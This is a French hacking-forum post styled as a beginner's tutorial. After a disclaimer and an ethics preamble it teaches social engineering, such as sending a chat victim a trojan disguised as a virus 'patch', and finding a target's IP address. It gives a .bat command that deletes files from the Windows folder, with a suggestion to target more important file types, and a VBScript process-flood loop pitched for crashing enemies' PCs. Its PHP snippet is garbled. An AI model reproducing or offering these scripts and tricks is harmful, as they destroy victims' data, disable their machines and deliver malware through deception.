Hacking
Bienvenue Dans Le Site De Piratage Pro Vous Pouvé Déposer Votre Hacking Préférer et dévoiler votre secrets ah ah ah !!!!!

Hacking

Piratage Informatique
 
AccueilFAQRechercherMembresGroupesS'enregistrerConnexion

Partagez | 
 

 Tutorial Le Hacking

Aller en bas 
AuteurMessage
Forum Pirateur
Admin
avatar

Messages : 4
Date d'inscription : 13/05/2010

MessageSujet: Tutorial Le Hacking   Dim 15 Aoû - 15:09






Petit cour de hacking



Ce tutoriel est a but uniquement informatif,PCParadise decline toute responsabilité quand a l'utilisation que vous en ferais et toutes les conséquences légales qui peuvent en découler.
Si vous l'employez pour autre chose, que ce pourquoi il est prévu, cela ne concerne que vous !



D'abord, je tiens à te préciser qu'il ne faut pas confondre un hacker avec un pirate. Par définition, un pirate est une personne qui contourne ou détruit les protections d'un logiciel, d'un ordinateur ou d'un réseau informatique (Journal officiel du 16 mars 1999 "Vocabulaire de l'informatique et de l'internet").
Alors qu'un hacker cherche les failles d'un système informatique pour en avertir son propriétaire, afin de sécuriser le système.

Définition de Hacker :

Tout d'abord, tu ne dois pas confondre un hacker avec un crasher.
Un hacker essai des s'infiltrer dans un système pour prouver qu'il est capable d'y prendre des informations et de les modifier. Il ne détruit rien, contrairement au crasher.
Il avertit toujours les propriétaires des systèmes en question des failles qu'il a trouvé.
Sans les hackers, l'informatique et internet serait bourré de failles et de bugs. 🇩🇯

Donc si tu trouves des failles sur un système ou un site internet, préviens le propriétaire au lieu de tout bousiller :grr:


Il y a différents types de hackers :

Les Lamerz :
Ils passent leur temps à se vanter de leurs "exploits".Ils se croient des super-hackers parce qu'ils savent spammer ou niq*** quelqu'un. Il font souvent parti d'un clan qu'ils appellent crew.

Les Newbies Sad
tu es soit un Newbie tout comme moi, soit un lamerz)
Ce sont des débutants dans le vaste monde du hacking. Un newbie ne se prend pas pour un king, ne pirate pas toutes les adresses email et les sites qu'il voit. Il a soif de connaissance, et ne cherche pas à brûler les étapes.

Les véritables Hackers :
Ce sont des pros, personne ne sait qui ils sont vraiment : ils n'exposent pas leurs exploits. Ils sont très puissants (voir les hackers célèbres), mais ne détruisent
rien, ils se contentent de montrer les failles qu'ils découvrent au grand jour pour qu'on puisse les réparer. (source : loadation.net)



Comme tu le sais peut être, il y a plusieurs types de hacks, dont voici quelques exemples :

-Le Social engeneering
- L’envoi de virus
- L’envoi de trojan
- Le piratage d’un site
- La cryptographie
- Les IP
- …
Dans ce premier chapitre, je vais t’apprendre le social engineering, pas très compliqué, mais peut se révéler fastidieux pour la victime. ^^

Le social engeneering

Tout d’abord, social engeneering, se traduit en français par ingénierie social
Ce type d'attaque peut toucher tout le monde (entreprise, anonymes...).
Tu as peut être déjà été victime de ce type d'attaque sans t’en être rendu compte.
J'explique : Cette méthode consiste, par exemple à se faire passer pour quelqu'un d'important et demander à la victime des informations confidentielles (ex: mot de passe). Ce type d'attaque ne dépend pas de ta connaissance en hack mais plutôt de ton imagination. Les 3 types d'attaques les plus répandues sont les attaques par mail, chat et téléphone.

Exemple : Sur un chat, tu rencontres quelqu'un à qui tu as dis que son ordinateur est infecté par un virus et que le seul moyen de l'enlever, c'est de mettre un certain patch. Ce patch tu le lui envoies, après l'avoir infecté par un trojan par exemple. Il installe le patch, et voilà ! Tu as accès à son ordinateur ! Mr. Green

Les trojans

Qu’est ce que c’est ?

Autrefois considérés comme outils pour lamerz les trojans disposaient de peu de fonctions et contenaient de nombreux bugs. Cependant en quelques années les trojans se sont hautement perfectionnés pour devenir des moyens de hack par excellence. Ceux ci disposent de nombreuses fonctions et contiennent beaucoup moins de bugs. Aussi "hacker" est devenu un art. Il faut user d'intelligence sociale, connaître à la perfection quelques langages de programmation, connaître également le fonctionnement du réseau, déjouer antivirus et firewalls... Maîtriser ces outils permet aussi de mieux déjouer un hacker. En effet il est impossible de pouvoir combattre un ennemi si on ne sait pas à quoi celui ci ressemble.(source : [Vous devez être inscrit et connecté pour voir ce lien] )

Un trojan (cheval de troie) est un programme qui permet à une personne de rentrer dans votre ordinateur, et d’en faire ce qu’il veut !
Diriger la souris, le clavier, faire des captures d’écrans, ouvrir le lecteur cd,…

L'envoi de virus


Créer un petit virus pas très méchant...

Avant de te faire ce petit cours, je dis une chose qui doit être respectée à la lettre ! : En aucun cas, je suis responsable de tes actes avec l’utilisation des virus !

Nous allons apprendre à créer un petit virus en *bat. :

C’est partit :

Pour commencer, ouvres le bloc-note windows  demarrer- programmes- accessoire- bloc-note.Ensuite, tapes sans sauter de ligne :


del C :windows*.bmp cls


Après, enrigistrer le code avec l’extension *.bat

Attention : N’ouvres en aucun cas le fichier sur ton ordinateur, le virus s’exécutera !

Précision :

del C:windows*.bmp

del : sert à supprimer
C:windows : situe le dossier où la commande doit avoir lieu
* : suivit d'une extension désigne tous les dossiers portant cette extension dans l'exemple l'extension est *.bmp .Donc ce mini virus supprimera tous les fichiers portant l'extension *.bmp (imagines que ce soit une autre extension!) se trouvant dans windows.

Ce virus pourrait être plus dangereux si tu changes l’extension en une autre plus importante, mais la, je te laisse libre choix à ton imagination !^^


Créer un virus plus méchant…

Je te le redis, je ne suis pas responsable de tes actes avec l’utilisation de ce virus !!

Tu rêves de savoir planter le pc de tes ennemis très facilement ?^^
Alors, lis ce petit cours … Twisted Evil

C’est partit :

Commences, par ouvrir le bloc note : demarrer- programmes- accessoire- bloc-note.
Ensuite, tapes le code suivant :


Set variable = CreateObject("WScript.Shell")
Do
variable.run "notepad",false
Loop

Ok?

Après, enregistres le avec le nom que tu veux, avec l’extension .vbs

Petite précision :

Ici, le bloc-note représente l'application désirée, tu peux la remplacer par une application plus lourde (pour des résultats plus rapides et meilleurs).
false : signifie que les fenêtres ne doivent pas être initialisées, seulement les processus pour que la victime ne se rende pas compte.
Loop : signifie que ça doit se faire en boucle : ça doit lancer le bloc-note, recommencer et ainsi de suite.

La cryptographie

Principe du fonctionnement…

Comme tu le sais peut être, protéger efficacement son PC et les données personnelles qu’il contient, relève d’un travail à plein temps. Les failles étant multiples, il faut toujours rester vigilant.

Le cryptage, consiste simplement à transformer un message pour qu’il ne soit compréhensible que par les seuls détenteurs d’un décodeurs .Vu que rien n’est jamais parfait en matière de sécurité informatique, on peut aussi dire que la cryptologie consiste simplement à faire « d’un gros secret, un secret plus petit », selon les mots de Bruce Schneier, expert en cryptographie.

Pour utiliser la cryptographie, je te recommandes le logiciel WinPT.
Téléchargement : [Vous devez être inscrit et connecté pour voir ce lien]

WinPT, utilise un système à double clé. Chaque utilisateur dispose d’une clé publique et d’une clé privée. Lorsque l’on désire envoyer un message crypté à un autre utilisateur PGP, on chiffre le message à l’aide de sa clé publique, clé librement et largement diffusée, y compris sur Internet. Le message circule alors déjà sous une forme incompréhensible à qui n’a pas de décodeur. Seule la personne qui dispose de la clé privée attachée à la clé publique qui a été utilisée pour le chiffrage pourra décoder le message.

Il existe plusieurs méthodes de cryptage, mais je vais t’en montré 3 :

La transposition

La transposition consiste en fait à changer l’ordre des caractères du texte clair.
Cette technique peut nécessiter une clé.

La palissade : Il s’agit de placer le texte clair en palissade

Bonjour :

b n o r
o j u

Ce qui donne : BNOROJU

Le boustrophédon : On place les lettres dans une grille, de gauche à droite.
Remarque : Il faut remplacer les cases vides par des lettres (au hasard) pour fausser le cryptage.

c r y
p t o

Et ensuite on lit de haut en bas et de bas en haut
CPTRYO

L'IP
Qu’est ce que c’est ?

L’IP est un identifiant composé de 4 nombres de 0 à 255 séparés par des points.
Chaque ordinateur connecté à Internet et chaque site Internet à une IP.
Ton IP est dynamique, c'est-à-dire qu’elle change à chaque connection. Tu peux te renseigner au près de ton FAI pour la rendre fixe mais ce n’est pas conseillé, Une IP fixe est vite ciblée par les Lamerz et pirateurs. (ainsi que les Hackers et les Newbie, mais on les considèrent comme les gentils^^)

Pour tout les ordinateur, l’IP locale est 127.0.0.1
A tout moment tu peux savoir ton IP en cliquant sur DémarrerExécuter, puis tu tape « winipcfg » ou « ipconfig » ( winipcfg ne marche pas sous XP)

Pour hacker un PC, il est indispensable de connaïtre l’IP de sa victime.

Comment trouvez l’IP d’une personne ?

Pour trouver l’adresse IP de quelqu’un c’est très simple :

Par IRC
Tape /dns pseudo

Par msn ou ICQ
Lors d’une conversation envoi un fichier ( de préférence assez volumineux) à ta victime, pendant l’envoi, clique sur DémarrerExécuter, et entre « cmd » pour ouvrir la fenêtre de commandes MS-DOS, puis entre la commande « netstat –n », et tu verras apparaître les adresses IP des sites et des personnes auquelle tu es connecté !

Par mail

Il faut demander à la victime de t’envoyer un mail à ton adresse hotmail (si tu en as une) à partir d’un fournisseur gratuit de mail (caramail, yahoo,voila, laposte,…).
Dans hotmail vas dans OptionsCourrierParamètres d’affichage du courrier, dans « en-tête de message » coche la case « complet », tu verras ainsi des informations complémentaires sur les destinataires des mails que tu reçois, dont l’IP.

Par PHP

Si tu as un site Internet, tu peux récupérer l’IP d’un visiteur grâce au PHP. Pour cela tu dois incorporer ce script dans ta page .php :
Code:

< ?
// On récupère l’IP
if( !$HTTP_X_FORWARED_FOR)$ip= ^REMOTE_ADDR;
else $ip = $HTTP_X_FORWARED_FOR;
//On enregistre l’IP dans le fichier ip.txt
$fp=fopen(« ip.txt », »a ») ;
fputs($fp,”$ip/n”);
fclose($fp);
?>



Tu n’as plus qu’à aller chercher l’IP de ta victime dans ton fichier ip.txt (ce script enregistre l’IP de chaque visiteur de la page, Une IP par ligne).

Pour trouvez l’IP d’un site, rien de plus simple :

Par PHP

Si tu as un site Internet, tu peux récupérer l’IP d’un site Internet facilement. Par exemple, on a une page « ip.php » qui contient ce code :
Code:

< ?
echo gethostbyname ($site) ;
?>



Wink
Karagonis

Merci de ne pas copier ce tuto sans l'autorisation de l'auteur!
Revenir en haut Aller en bas
Voir le profil de l'utilisateur http://hacking-secu.superforum.fr
 
Tutorial Le Hacking
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» Tutorial Delete Doctor
» Tutorial pour renommer ComboFix
» Tutorial clean
» Tutorial ClamWin Portable
» Tutorial : Comment installer Ad-Aware Free Antivirus 10 Fr

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Hacking :: Piratage informatique de Débutant-
Sauter vers: